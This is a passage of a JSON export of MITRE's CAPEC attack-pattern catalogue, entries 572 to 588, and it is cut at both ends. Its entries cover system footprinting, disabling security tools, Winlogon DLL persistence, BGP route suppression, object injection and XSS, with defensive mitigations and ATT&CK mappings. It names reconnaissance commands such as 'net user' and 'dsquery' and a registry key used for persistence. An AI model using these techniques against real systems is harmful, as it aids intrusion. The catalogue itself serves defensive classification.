Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"572":{"ID":"572","Name":"Artificially Inflate File Sizes","Abstraction":"Standard","Status":"Draft","Description":{"p":"An adversary modifies file contents by adding data to files for several reasons. Many different attacks could \u201cfollow\u201d this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity."},"Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Example_Instances":{"Example":{"p":"An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1027.001","Entry_Name":"Obfuscated Files or Information:Binary Padding"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Likelihood_Of_Attack, Taxonomy_Mappings, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"573":{"ID":"573","Name":"Process Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Example_Instances":{"Example":["On a Windows system, the command, \\"tasklist,\\" displays information about processes. The same function on a Mac OS system is done with the command, \\"ps.\\"","In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1057","Entry_Name":"Process Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"574":{"ID":"574","Name":"Services Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include \\"sc\\" and \\"tasklist/svc\\" using Tasklist, and \\"net start\\" using Net.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1007","Entry_Name":"System Service Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"575":{"ID":"575","Name":"Account Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: \\"net user\\" and \\"dsquery\\".","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1087","Entry_Name":"Account Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"576":{"ID":"576","Name":"Group Permission Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is \\"net localgroup\\".","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Identify programs (such as \\"net\\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1069","Entry_Name":"Permission Groups Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}]}},"577":{"ID":"577","Name":"Owner Footprinting","Abstraction":"Standard","Status":"Draft","Description":"An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \\"dir /A ntuser.dat\\". Which will display the last modified time of a user\'s ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.","Administrator permissions are required to view the home folder of other users."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Ensure that proper permissions on files and folders are enacted to limit accessibility."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1033","Entry_Name":"System Owner/User Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"578":{"ID":"578","Name":"Disable Security Software","Abstraction":"Standard","Status":"Usable","Description":"An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have the capability to interact with the configuration of the targeted system."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Hide Activities","Note":"By disabling certain security tools, the adversary can hide malicious activity and avoid detection."}},"Mitigations":{"Mitigation":"Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.001","Entry_Name":"Impair Defenses:Disable or Modify Tools"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"579":{"ID":"579","Name":"Replace Winlogon Helper DLL","Abstraction":"Detailed","Status":"Draft","Description":"Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Changes to registry entries in \\"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\Winlogon\\\\Notify\\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.004","Entry_Name":"Boot or Logon Autostart Execution:Winlogon helper DLL"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}}},"580":{"ID":"580","Name":"System Footprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must have logical access to the target network and system."},"Skills_Required":{"Skill":["The adversary needs to know basic linux commands.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1518","Entry_Name":"Software Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description"}],"Previous_Entry_Name":["Application Footprinting",{"Date":"2020-12-17"}]}},"581":{"ID":"581","Name":"Security Software Footprinting","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"580"}},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1518.001","Entry_Name":"Software Discovery:Security Software Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"582":{"ID":"582","Name":"Route Disabling","Abstraction":"Standard","Status":"Draft","Description":"An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \\"Internet kill switch\\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"The adversary requires knowledge of and access to network route."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a network route denies the availability of a service."}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-02-14"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"583":{"ID":"583","Name":"Disabling Network Hardware","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":"The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Denial of Service"}},"Mitigations":{"Mitigation":"Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems.."},"References":{"Reference":{"External_Reference_ID":"REF-464"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"584":{"ID":"584","Name":"BGP Route Disabling","Abstraction":"Detailed","Status":"Draft","Description":"An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince"},"Resources_Required":{"Resource":"BGP Router"},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a network route at the routing infrastructure level denies availability of that route."}},"Mitigations":{"Mitigation":["Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.","Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography."]},"Example_Instances":{"Example":"Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped."},"References":{"Reference":[{"External_Reference_ID":"REF-465"},{"External_Reference_ID":"REF-466"}]},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"585":{"ID":"585","Name":"DNS Domain Seizure","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, an adversary influences a target\'s web-hosting company to disables a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"582","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"514"},{"Exclude_ID":"512"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"This attack pattern requires that the adversary has cooperation from the registrar of the target domain."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Disabling a target domain at the infrastructure level denies the availability of its service to the user."}},"Example_Instances":{"Example":"The FBI\'s seizure of gambling websites, the US DOJ\'s seizure of child pornography websites, and Microsoft\'s seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains."},"References":{"Reference":{"External_Reference_ID":"REF-467"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"586":{"ID":"586","Name":"Object Injection","Abstraction":"Meta","Status":"Draft","Description":"An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application must unserialize data before validation."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources."},{"Scope":"Integrity","Impact":"Modify Data","Note":"Attackers can modify objects or data that was assumed to be safe from modification."},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Functions that assume information in the deserialized object is valid could be exploited."}]},"Mitigations":{"Mitigation":[{"p":"Implementation: Validate object before deserialization process"},{"p":"Design: Limit which types can be deserialized."},{"p":"Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes."},{"p":"Implementation: Keep session state on the server, when possible."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"502"}},"References":{"Reference":{"External_Reference_ID":"REF-468"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-02-06"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"587":{"ID":"587","Name":"Cross Frame Scripting (XFS)","Abstraction":"Detailed","Status":"Draft","Description":"This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"195","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The user\'s browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site."}},"Mitigations":{"Mitigation":["Avoid clicking on untrusted links.","Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame."]},"Example_Instances":{"Example":"An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Frame Scripting"}},"References":{"Reference":[{"External_Reference_ID":"REF-469"},{"External_Reference_ID":"REF-470"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-02-01"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, Mitigations, Taxonomy_Mappings"}]}},"588":{"ID":"588","Name":"DOM-Based XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that manipulates the DOM via client-side scripting.","An application that failS to adequately sanitize or encode untrusted input."]},"Skills_Required":{"Skill":["Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful DOM-based XSS attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize proper character encoding for all output 